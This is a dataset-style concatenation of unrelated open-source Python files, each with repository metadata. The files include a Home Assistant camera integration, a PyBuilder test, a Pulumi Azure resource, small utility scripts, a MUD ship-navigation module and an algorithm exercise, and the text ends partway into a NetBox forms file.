CAMERA_SERVICES = {
_DEV_EN_ALT: "async_enable_alerts",
_DEV_DS_ALT: "async_disable_alerts",
_DEV_EN_REC: "async_start_recording",
_DEV_DS_REC: "async_stop_recording",
_DEV_SNAP: "async_snapshot",
}
async def async_setup_entry(
hass, config_entry, async_add_entities, discovery_info=None
):
"""Set up the Agent cameras."""
filter_urllib3_logging()
cameras = []
server = hass.data[AGENT_DOMAIN][config_entry.entry_id][CONNECTION]
if not server.devices:
_LOGGER.warning("Could not fetch cameras from Agent server")
return
for device in server.devices:
if device.typeID == 2:
camera = AgentCamera(device)
cameras.append(camera)
async_add_entities(cameras)
platform = entity_platform.current_platform.get()
for service, method in CAMERA_SERVICES.items():
platform.async_register_entity_service(service, {}, method)
class AgentCamera(MjpegCamera):
"""Representation of an Agent Device Stream."""
def __init__(self, device):
"""Initialize as a subclass of MjpegCamera."""
self._servername = device.client.name
self.server_url = device.client._server_url
device_info = {
CONF_NAME: device.name,
CONF_MJPEG_URL: f"{self.server_url}{device.mjpeg_image_url}&size={device.mjpegStreamWidth}x{device.mjpegStreamHeight}",
CONF_STILL_IMAGE_URL: f"{self.server_url}{device.still_image_url}&size={device.mjpegStreamWidth}x{device.mjpegStreamHeight}",
}
self.device = device
self._removed = False
self._name = f"{self._servername} {device.name}"
self._unique_id = f"{device._client.unique}_{device.typeID}_{device.id}"
super().__init__(device_info)
@property
def device_info(self):
"""Return the device info for adding the entity to the agent object."""
return {
"identifiers": {(AGENT_DOMAIN, self._unique_id)},
"name": self._name,
"manufacturer": "Agent",
"model": "Camera",
"sw_version": self.device.client.version,
}
async def async_update(self):
"""Update our state from the Agent API."""
try:
await self.device.update()
if self._removed:
_LOGGER.debug("%s reacquired", self._name)
self._removed = False
except AgentError:
if self.device.client.is_available: # server still available - camera error
if not self._removed:
_LOGGER.error("%s lost", self._name)
self._removed = True
@property
def extra_state_attributes(self):
"""Return the Agent DVR camera state attributes."""
return {
ATTR_ATTRIBUTION: ATTRIBUTION,
"editable": False,
"enabled": self.is_on,
"connected": self.connected,
"detected": self.is_detected,
"alerted": self.is_alerted,
"has_ptz": self.device.has_ptz,
"alerts_enabled": self.device.alerts_active,
}
@property
def should_poll(self) -> bool:
"""Update the state periodically."""
return True
@property
def is_recording(self) -> bool:
"""Return whether the monitor is recording."""
return self.device.recording
@property
def is_alerted(self) -> bool:
"""Return whether the monitor has alerted."""
return self.device.alerted
@property
def is_detected(self) -> bool:
"""Return whether the monitor has alerted."""
return self.device.detected
@property
def available(self) -> bool:
"""Return True if entity is available."""
return self.device.client.is_available
@property
def connected(self) -> bool:
"""Return True if entity is connected."""
return self.device.connected
@property
def supported_features(self) -> int:
"""Return supported features."""
return SUPPORT_ON_OFF
@property
def is_on(self) -> bool:
"""Return true if on."""
return self.device.online
@property
def icon(self):
"""Return the icon to use in the frontend, if any."""
if self.is_on:
return "mdi:camcorder"
return "mdi:camcorder-off"
@property
def motion_detection_enabled(self):
"""Return the camera motion detection status."""
return self.device.detector_active
@property
def unique_id(self) -> str:
"""Return a unique identifier for this agent object."""
return self._unique_id
async def async_enable_alerts(self):
"""Enable alerts."""
await self.device.alerts_on()
async def async_disable_alerts(self):
"""Disable alerts."""
await self.device.alerts_off()
async def async_enable_motion_detection(self):
"""Enable motion detection."""
await self.device.detector_on()
async def async_disable_motion_detection(self):
"""Disable motion detection."""
await self.device.detector_off()
async def async_start_recording(self):
"""Start recording."""
await self.device.record()
async def async_stop_recording(self):
"""Stop recording."""
await self.device.record_stop()
async def async_turn_on(self):
"""Enable the camera."""
await self.device.enable()
async def async_snapshot(self):
"""Take a snapshot."""
await self.device.snapshot()
async def async_turn_off(self):
"""Disable the camera."""
await self.device.disable()
| 30.078704 | 137 | 0.64322 | [
"Apache-2.0"
] | CantankerousBullMoose/core | homeassistant/components/agent_dvr/camera.py | 6,497 | Python |
# -*- coding: utf-8 -*-
#
# This file is part of PyBuilder
#
# Copyright 2011-2015 PyBuilder Team
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
from pybuilder.errors import BuildFailedException
from pybuilder.plugins.python.test_plugin_helper import ReportsProcessor
from test_utils import Mock, patch
class ReportsProcessorTests(unittest.TestCase):
def setUp(self):
self.reports_processor = ReportsProcessor(Mock(), Mock())
total_time = Mock()
total_time.get_millis.return_value = 42
self.reports_processor.process_reports([], total_time)
def test_should_raise_exception_when_not_all_tests_pass(self):
self.reports_processor.tests_failed = 1
self.assertRaises(BuildFailedException, self.reports_processor.write_report_and_ensure_all_tests_passed)
def test_should_not_raise_exception_when_all_tests_pass(self):
self.reports_processor.tests_failed = 0
self.reports_processor.write_report_and_ensure_all_tests_passed()
@patch("pybuilder.plugins.python.test_plugin_helper.render_report", return_value='rendered-report')
def test_should_write_report(self, render_report):
self.reports_processor.write_report_and_ensure_all_tests_passed()
self.reports_processor.project.write_report.assert_called_with("integrationtest.json", 'rendered-report')
def test_should_parse_reports(self):
reports = [
{'test': 'name1', 'test_file':
'file1', 'success': False, 'time': 1},
{'test': 'name2', 'test_file':
'file2', 'success': False, 'time': 2},
{'test': 'name3', 'test_file':
'file3', 'success': True, 'time': 3},
{'test': 'name4', 'test_file': 'file4', 'success': True, 'time': 4}
]
self.reports_processor.process_reports(reports, Mock())
self.assertEqual(self.reports_processor.tests_failed, 2)
self.assertEqual(self.reports_processor.tests_executed, 4)
def test_should_create_test_report_with_attributes(self):
mock_time = Mock()
mock_time.get_millis.return_value = 42
self.reports_processor.process_reports([], mock_time)
self.reports_processor.tests_failed = 4
self.reports_processor.tests_executed = 42
self.reports_processor.reports = ['a', 'b', 'c']
self.assertEqual(self.reports_processor.test_report,
{
'num_of_tests': 42,
'success': False,
'tests': ['a', 'b', 'c'],
'tests_failed': 4,
'time': 42
}
)
| 39.878049 | 113 | 0.654434 | [
"Apache-2.0"
] | AlexeySanko/pybuilder | src/unittest/python/plugins/python/test_plugin_helper_tests.py | 3,270 | Python |
from .base import Index
from .multi import MultiIndex
from .range import RangeIndex
| 21 | 29 | 0.821429 | [
"BSD-3-Clause"
] | cda-group/baloo | baloo/core/indexes/__init__.py | 84 | Python |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from ... import _utilities
from . import outputs
from ._inputs import *
__all__ = ['SqlPoolsV3Args', 'SqlPoolsV3']
@pulumi.input_type
class SqlPoolsV3Args:
def __init__(__self__, *,
resource_group_name: pulumi.Input[str],
workspace_name: pulumi.Input[str],
location: Optional[pulumi.Input[str]] = None,
sku: Optional[pulumi.Input['SkuArgs']] = None,
sql_pool_name: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None):
"""
The set of arguments for constructing a SqlPoolsV3 resource.
:param pulumi.Input[str] resource_group_name: The name of the resource group. The name is case insensitive.
:param pulumi.Input[str] workspace_name: The name of the workspace.
:param pulumi.Input[str] location: The geo-location where the resource lives
:param pulumi.Input['SkuArgs'] sku: The sql pool SKU. The list of SKUs may vary by region and support offer.
:param pulumi.Input[str] sql_pool_name: The name of the sql pool.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Resource tags.
"""
pulumi.set(__self__, "resource_group_name", resource_group_name)
pulumi.set(__self__, "workspace_name", workspace_name)
if location is not None:
pulumi.set(__self__, "location", location)
if sku is not None:
pulumi.set(__self__, "sku", sku)
if sql_pool_name is not None:
pulumi.set(__self__, "sql_pool_name", sql_pool_name)
if tags is not None:
pulumi.set(__self__, "tags", tags)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Input[str]:
"""
The name of the resource group. The name is case insensitive.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter(name="workspaceName")
def workspace_name(self) -> pulumi.Input[str]:
"""
The name of the workspace.
"""
return pulumi.get(self, "workspace_name")
@workspace_name.setter
def workspace_name(self, value: pulumi.Input[str]):
pulumi.set(self, "workspace_name", value)
@property
@pulumi.getter
def location(self) -> Optional[pulumi.Input[str]]:
"""
The geo-location where the resource lives
"""
return pulumi.get(self, "location")
@location.setter
def location(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "location", value)
@property
@pulumi.getter
def sku(self) -> Optional[pulumi.Input['SkuArgs']]:
"""
The sql pool SKU. The list of SKUs may vary by region and support offer.
"""
return pulumi.get(self, "sku")
@sku.setter
def sku(self, value: Optional[pulumi.Input['SkuArgs']]):
pulumi.set(self, "sku", value)
@property
@pulumi.getter(name="sqlPoolName")
def sql_pool_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the sql pool.
"""
return pulumi.get(self, "sql_pool_name")
@sql_pool_name.setter
def sql_pool_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "sql_pool_name", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
Resource tags.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
class SqlPoolsV3(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
location: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
sku: Optional[pulumi.Input[pulumi.InputType['SkuArgs']]] = None,
sql_pool_name: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
workspace_name: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
A sql pool resource.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] location: The geo-location where the resource lives
:param pulumi.Input[str] resource_group_name: The name of the resource group. The name is case insensitive.
:param pulumi.Input[pulumi.InputType['SkuArgs']] sku: The sql pool SKU. The list of SKUs may vary by region and support offer.
:param pulumi.Input[str] sql_pool_name: The name of the sql pool.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Resource tags.
:param pulumi.Input[str] workspace_name: The name of the workspace.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: SqlPoolsV3Args,
opts: Optional[pulumi.ResourceOptions] = None):
"""
A sql pool resource.
:param str resource_name: The name of the resource.
:param SqlPoolsV3Args args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(SqlPoolsV3Args, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
location: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
sku: Optional[pulumi.Input[pulumi.InputType['SkuArgs']]] = None,
sql_pool_name: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
workspace_name: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = SqlPoolsV3Args.__new__(SqlPoolsV3Args)
__props__.__dict__["location"] = location
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__.__dict__["resource_group_name"] = resource_group_name
__props__.__dict__["sku"] = sku
__props__.__dict__["sql_pool_name"] = sql_pool_name
__props__.__dict__["tags"] = tags
if workspace_name is None and not opts.urn:
raise TypeError("Missing required property 'workspace_name'")
__props__.__dict__["workspace_name"] = workspace_name
__props__.__dict__["current_service_objective_name"] = None
__props__.__dict__["kind"] = None
__props__.__dict__["name"] = None
__props__.__dict__["requested_service_objective_name"] = None
__props__.__dict__["sql_pool_guid"] = None
__props__.__dict__["status"] = None
__props__.__dict__["system_data"] = None
__props__.__dict__["type"] = None
alias_opts = pulumi.ResourceOptions(aliases=[pulumi.Alias(type_="azure-nextgen:synapse/v20200401preview:SqlPoolsV3"), pulumi.Alias(type_="azure-native:synapse:SqlPoolsV3"), pulumi.Alias(type_="azure-nextgen:synapse:SqlPoolsV3"), pulumi.Alias(type_="azure-native:synapse/v20190601preview:SqlPoolsV3"), pulumi.Alias(type_="azure-nextgen:synapse/v20190601preview:SqlPoolsV3"), pulumi.Alias(type_="azure-native:synapse/v20201201:SqlPoolsV3"), pulumi.Alias(type_="azure-nextgen:synapse/v20201201:SqlPoolsV3"), pulumi.Alias(type_="azure-native:synapse/v20210301:SqlPoolsV3"), pulumi.Alias(type_="azure-nextgen:synapse/v20210301:SqlPoolsV3"), pulumi.Alias(type_="azure-native:synapse/v20210401preview:SqlPoolsV3"), pulumi.Alias(type_="azure-nextgen:synapse/v20210401preview:SqlPoolsV3")])
opts = pulumi.ResourceOptions.merge(opts, alias_opts)
super(SqlPoolsV3, __self__).__init__(
'azure-native:synapse/v20200401preview:SqlPoolsV3',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None) -> 'SqlPoolsV3':
"""
Get an existing SqlPoolsV3 resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = SqlPoolsV3Args.__new__(SqlPoolsV3Args)
__props__.__dict__["current_service_objective_name"] = None
__props__.__dict__["kind"] = None
__props__.__dict__["location"] = None
__props__.__dict__["name"] = None
__props__.__dict__["requested_service_objective_name"] = None
__props__.__dict__["sku"] = None
__props__.__dict__["sql_pool_guid"] = None
__props__.__dict__["status"] = None
__props__.__dict__["system_data"] = None
__props__.__dict__["tags"] = None
__props__.__dict__["type"] = None
return SqlPoolsV3(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="currentServiceObjectiveName")
def current_service_objective_name(self) -> pulumi.Output[str]:
"""
The current service level objective name of the sql pool.
"""
return pulumi.get(self, "current_service_objective_name")
@property
@pulumi.getter
def kind(self) -> pulumi.Output[str]:
"""
Kind of SqlPool.
"""
return pulumi.get(self, "kind")
@property
@pulumi.getter
def location(self) -> pulumi.Output[str]:
"""
The geo-location where the resource lives
"""
return pulumi.get(self, "location")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
The name of the resource
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="requestedServiceObjectiveName")
def requested_service_objective_name(self) -> pulumi.Output[str]:
"""
The requested service level objective name of the sql pool.
"""
return pulumi.get(self, "requested_service_objective_name")
@property
@pulumi.getter
def sku(self) -> pulumi.Output[Optional['outputs.SkuResponse']]:
"""
The sql pool SKU. The list of SKUs may vary by region and support offer.
"""
return pulumi.get(self, "sku")
@property
@pulumi.getter(name="sqlPoolGuid")
def sql_pool_guid(self) -> pulumi.Output[str]:
"""
The Guid of the sql pool.
"""
return pulumi.get(self, "sql_pool_guid")
@property
@pulumi.getter
def status(self) -> pulumi.Output[str]:
"""
The status of the sql pool.
"""
return pulumi.get(self, "status")
@property
@pulumi.getter(name="systemData")
def system_data(self) -> pulumi.Output['outputs.SystemDataResponse']:
"""
SystemData of SqlPool.
"""
return pulumi.get(self, "system_data")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
"""
Resource tags.
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter
def type(self) -> pulumi.Output[str]:
"""
The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or "Microsoft.Storage/storageAccounts"
"""
return pulumi.get(self, "type")
| 41.303681 | 789 | 0.637653 | [
"Apache-2.0"
] | sebtelko/pulumi-azure-native | sdk/python/pulumi_azure_native/synapse/v20200401preview/sql_pools_v3.py | 13,465 | Python |
import cv2
from PIL import ImageGrab
import numpy as np
def main():
while True:
# bbox specifies specific region (bbox= x,y,width,height)
img = ImageGrab.grab(bbox=(0, 40, 1075, 640))
vanilla = img_np = np.array(img)
img_np = np.array(img)
gray = cv2.cvtColor(img_np, cv2.COLOR_BGR2GRAY)
_, binary = cv2.threshold(gray, 100, 255, cv2.THRESH_BINARY_INV)
contours, hierarchy = cv2.findContours(
binary, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
image = cv2.drawContours(img_np, contours, -1, (0, 255, 0), 2)
cv2.imshow("test", image)
if cv2.waitKey(25) & 0xFF == ord('q'):
cv2.destroyAllWindows()
print("test")
break
else:
cv2.waitKey(1)
# cv2.waitKey(0)
if __name__ == "__main__":
main()
| 29.551724 | 72 | 0.57993 | [
"Apache-2.0"
] | kymotsujason/crossybot | main.py | 857 | Python |
from timetableparser import TimeTableParser
from timetablewriter import TimeTableWriter
parser = TimeTableParser(False)
writer = TimeTableWriter(True)
# parser.decrypt_pdf("test/a.pdf", "out_a.pdf")
# parser.decrypt_pdf("test/b.pdf", "out_b.pdf")
csv_file_a = "test/output_week_a.csv"
csv_file_b = "test/output_week_b.csv"
# parser.extract_table_from_pdf("out_a.pdf", csv_file_a)
# parser.extract_table_from_pdf("out_b.pdf", csv_file_b)
writer.write_excel("Scott", parser.parse_csv(csv_file_a), parser.parse_csv(csv_file_b), "test/output.xlsx")
print("output file is `test/output.xlsx`")
| 42.071429 | 107 | 0.791171 | [
"MIT"
] | SCOTT-HAMILTON/Pdf2TimeTable | Pdf2TimeTable/test.py | 589 | Python |
# -*-coding:Utf-8 -*
# Copyright (c) 2014 LE GOFF Vincent
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# * Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT
# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""Objectif rejoindre."""
from math import fabs, radians, sqrt
from vector import Vector
from primaires.vehicule.vecteur import Vecteur
from secondaires.navigation.constantes import *
from secondaires.navigation.equipage.objectif import Objectif
class Rejoindre(Objectif):
"""Objectif rejoindre.
Cet objectif demande à un équipage de rejoindre un point précisé
en coordonnées. Le point indiqué doit être statique (il existe un
objectif particulier pour les points mobiles, comme les navires, qui
intègrent leur propre calcul).
Cet objectif est responsable de trouver un chemin entre le point
actuel et le point visé. Cela inclut le choix de chemins
détournés si le chemin direct ne peut être pris avec des calculs qui
peuvent être assez complexes pour déterminer la vitesse et direction
des chemins intermédiaires.
"""
def __init__(self, equipage, x=None, y=None, vitesse=1):
Objectif.__init__(self, equipage, x, y, vitesse)
self.x = x
self.y = y
self.vitesse = vitesse
self.ancienne_vitesse = None
self.vitesse_optimale = vitesse
self.autre_direction = None
self.autoriser_vitesse_sup = True
self.doit_reculer = ()
def afficher(self):
"""Méthode à redéfinir retournant l'affichage de l'objectif."""
if self.doit_reculer:
return "Doit reculer"
navire = self.navire
distance = self.get_distance()
direction = (distance.direction + 90) % 360
msg_dist = get_nom_distance(distance)
return "Cap sur {}° ({}), à {}".format(round(direction),
distance.nom_direction, msg_dist)
def get_distance(self):
"""Retourne la distance (Vecteur) entre le navire et la destination.
Cette méthode crée un vecteur (class Vecteur définie dans
le module primaire vehicule) qui représente la distance entre
la position du navire et la destination.
"""
navire = self.navire
position = navire.opt_position
o_x = position.x
o_y = position.y
d_x = self.x
d_y = self.y
distance = Vecteur(d_x - o_x, d_y - o_y, 0)
return distance
def trouver_distance_min(self, cible):
"""Trouve la distance minimum.
Cette distance est fonction de la distance minimum entre
une salle du navire d'origine et une salle du navire cible.
"""
navire = self.navire
etendue = navire.etendue
altitude = etendue.altitude
salle_cible = None
distance = None
for salle in navire.salles.values():
if salle.coords.z != altitude:
continue
x, y = salle.coords.x, salle.coords.y
for t_salle in cible.salles.values():
if t_salle.coords.z != altitude:
continue
t_x, t_y = t_salle.coords.x, t_salle.coords.y
t_distance = sqrt((t_x - x) ** 2 + (t_y - y) ** 2)
if distance is None or t_distance < distance:
distance = t_distance
salle_cible = t_salle
return distance, salle_cible
def transmettre_controles(self):
"""Donne les contrôles indiqués (vitesse et direction)."""
equipage = self.equipage
navire = self.navire
distance = self.get_distance()
if self.autre_direction:
direction = round(self.autre_direction)
else:
direction = round(distance.direction)
# Crée ou modifie les contrôles
if equipage.controles.get("direction"):
equipage.controles["direction"].direction = direction
else:
equipage.controler("direction", direction)
vitesse = self.vitesse
if equipage.controles.get("vitesse"):
ancienne_vitesse = equipage.controles["vitesse"].vitesse
equipage.controles["vitesse"].vitesse = vitesse
if vitesse != ancienne_vitesse:
equipage.controles["vitesse"].calculer_vitesse()
else:
equipage.controler("vitesse", self.vitesse,
self.autoriser_vitesse_sup)
def trouver_cap(self):
"""Trouve le cap, tenant compte des obstacles."""
equipage = self.equipage
navire = self.navire
# Si on doit reculer, vérifie que c'est toujours vrai
if self.doit_reculer:
x, y = self.doit_reculer
p_x = navire.position.x
p_y = navire.position.y
max_distance = navire.get_max_distance_au_centre()
if sqrt((x - p_x) ** 2 + (y - p_y) ** 2) > max_distance + 1:
self.doit_reculer = ()
else:
return
# On examine les points listés par la vigie
# Si il n'y a pas de vigie, pas le moyen de les éviter
tries = equipage.vigie_tries
# Si le dictionnaire est vide, ne fait rien
if not tries:
self.autre_direction = None
self.transmettre_controles()
return
# On n'examine que les obstacles
obstacles = tries.get("obstacle", {}).copy()
obstacles.update(tries.get("salle", {}))
obstacles.update(tries.get("sallenavire", {}))
# On s'intéresse seulement aux obstacles qui ont un angle
# dangereux, entre -90° et 90°
dangereux = obstacles.copy()
for angle in obstacles.keys():
if angle < -90 or angle > 90:
del dangereux[angle]
# Si il n'y a aucun obstacle, ne continue pas
if not dangereux:
self.ancienne_vitesse = None
self.autre_direction = None
self.transmettre_controles()
return
# Maintenant on cherche la distance la plus courte
min_angle = None
min_distance = None
for angle, (vecteur, point) in dangereux.items():
if min_distance is None or vecteur.mag < min_distance:
min_distance = vecteur.mag
min_angle = angle
# En fonction de la distance, modifie la vitesse
if -45 <= min_angle <= 45:
if min_distance <= 2:
self.vitesse = 0.05
elif min_distance < 10:
self.vitesse = 0.2
elif min_distance < 25:
self.vitesse = 0.6
# Cherche ensuite le meilleur cap
# On cherche le meilleur cap possible (c'est-à-dire le plus long)
distance = 30
angles = [i * 5 for i in range(0, 35)]
for i in range(1, 35):
angles.append(i * -5)
# Si on est pas exactement dans la bonne direction pour rejoindre
# le point (x, y), on envisage de changer de cap
o_distance = self.get_distance()
if o_distance.norme < 30:
distance = o_distance.norme
relative = o_distance.direction - navire.direction.direction
angles = sorted(angles, key=lambda a: fabs(a - relative))
position = navire.opt_position
while distance > 0:
for angle in angles:
vecteur = navire.opt_direction
vecteur.mag = distance
vecteur.around_z(radians(angle))
if not navire.controller_collision(vecteur, collision=False,
marge=0.8):
if angle != 0:
self.info("Cap libre sur {}°".format(angle))
self.autre_direction = round((
navire.direction.direction + angle) % 360)
if fabs(angle) > 30:
self.vitesse = 0
self.transmettre_controles()
return
distance -= 5
# On ne change pas de cap mais peut-être change-t-on de vitesse
self.transmettre_controles()
def creer(self):
"""L'objectif est créé.
On crée les contrôles associéss pour atteindre l'objectif
visé, à savoir, rejoindre le point (x, y), en essayant
de trouver les obstacles corresondant et un cap de remplacement
si nécessaire.
"""
equipage = self.equipage
commandant = self.commandant
if commandant is None:
return
self.trouver_cap()
def verifier(self, prioritaire):
"""Vérifie que l'objectif est toujours valide.
Dans cette méthode, on vérifie :
Qu'il n'y a aucun obstacle sur la trajectoire assignée
"""
equipage = self.equipage
navire = self.navire
commandant = self.commandant
if commandant is None:
return
if prioritaire:
self.trouver_cap()
def reagir_collision(self, salle, contre):
"""Réagit à une collision."""
if not self.doit_reculer:
commandant = self.commandant
if commandant is None:
return
personnage = commandant.personnage
navire = self.navire
equipage = self.equipage
p_x = navire.position.x
p_y = navire.position.y
self.warning("Essaye de faire reculer le navire")
self.doit_reculer = (p_x, p_y)
# Supprime le contrôle de cap, si il existe
equipage.retirer_controle("direction")
if navire.gouvernail:
equipage.demander("relacher_gouvernail",
personnage=personnage)
# Demande de plier les voiles si besoin
if any(v.hissee for v in navire.voiles):
equipage.demander("plier_voiles", None, personnage=personnage)
# Demande de ramer en marche arrière
rames = navire.rames
if rames:
# On doit centrer les rames si besoin
if any(r.orientation != 0 for r in rames):
equipage.demander("ramer", "centre",
personnage=personnage)
equipage.demander("ramer", "arrière", personnage=personnage)
| 36.12037 | 79 | 0.608989 | [
"BSD-3-Clause"
] | stormi/tsunami | src/secondaires/navigation/equipage/objectifs/rejoindre.py | 11,757 | Python |
"""
724. Minimum Partition
https://www.lintcode.com/problem/minimum-partition/description
01背包
算法班2020 C27 01背包变形
第1种dp定义
dp[i][j]: considering previous i items to fill <=j, what the maximum value
dp[i][j] = max(dp[i - 1][j], dp[i - 1][j - nums[i - 1]] + nums[i - 1])
dp[0][0] = 0
dp[i][0] = 0
answer
max(dp[n])
2d array
time limit exceeded
"""
class Solution:
"""
@param nums: the given array
@return: the minimum difference between their sums
"""
def findMin(self, nums):
# write your code here
if not nums:
return 0
n = len(nums)
total_sum = sum(nums)
target = total_sum // 2
dp = [[0] * (target + 1) for _ in range(2)]
now, old = 0, 0
for i in range(1, n + 1):
old = now
now = 1 - now
for j in range(0, target + 1):
dp[now][j] = dp[old][j]
if j >= nums[i - 1]:
dp[now][j] = max(dp[now][j], dp[old][j - nums[i - 1]] + nums[i - 1])
return total_sum - 2 * max(dp[now])
s = Solution()
nums = [987,523,979,847,734,706,452,903,702,332,713,181,991,843,879,505,718,694,18,303,795,521,696,388,866,908,350,528,445,780,864,295,257,337,704,648,495,949,39,33,606,553,618,191,854,405,715,413,472,185,216,489,212,199,162,462,929,191,429,726,902,9,579,403,370,435,871,160,197,884,619,716,182,7,906,974,679,531,852,158,861,174,445,701,871,557,942,798,921,389,450,485,901,179,515,401,117,451,731,828,685,20,50,673,891,232,30,385,511,338,375,118,81,392,296,546,903,59,580,620,268,422,597,876,333,766,158,295,443,204,434,357,632,592,543,341,434,58,525,683,338,165,332,51,152,191,378,63,10,475,951,469,622,811,296,415,282,547,994,358,134,195,888,75,195,805,908,673,867,346,935,318,603,507,45,209,54,641,515,867,881,880,290,781,452,808,775,998,731,908,451,592,608,87,1000,812,30,673,393,380,241,135,421,144,954,64,747,502,633]
print(s.findMin(nums)) | 37.230769 | 823 | 0.61312 | [
"MIT"
] | jianershi/algorithm | lintcode/724.1.py | 1,962 | Python |
from rdkit import Chem
from rdkit.Chem.EnumerateStereoisomers import EnumerateStereoisomers, StereoEnumerationOptions
molecules = open('glucose_degradation_output.csv','r')
lines = molecules.readlines()
counter = 0
with open('Glucose_Desc.csv', 'w') as the_file:
the_file.write("Generation,Id,NumStereoIsomers"+'\n')
for line in lines:
counter +=1
line=line.rstrip('\n')
line=line.split('\t')
m = Chem.MolFromSmiles(line[1])
isomers = tuple(EnumerateStereoisomers(m))
numste = str(len(isomers))
the_file.write(line[0]+","+line[1]+","+numste+'\n')
| 33.352941 | 94 | 0.730159 | [
"BSD-3-Clause"
] | Reaction-Space-Explorer/reac-space-exp | plots/stereoisomer_gen.py | 567 | Python |
from Crypto.Cipher import PKCS1_OAEP
from Crypto.PublicKey import RSA
from django import forms
from taggit.forms import TagField
from dcim.models import Device
from extras.forms import (
AddRemoveTagsForm, CustomFieldBulkEditForm, CustomFieldFilterForm, CustomFieldModelForm, CustomFieldModelCSVForm,
)
from utilities.forms import (
APISelect, APISelectMultiple, BootstrapMixin, DynamicModelChoiceField, DynamicModelMultipleChoiceField,
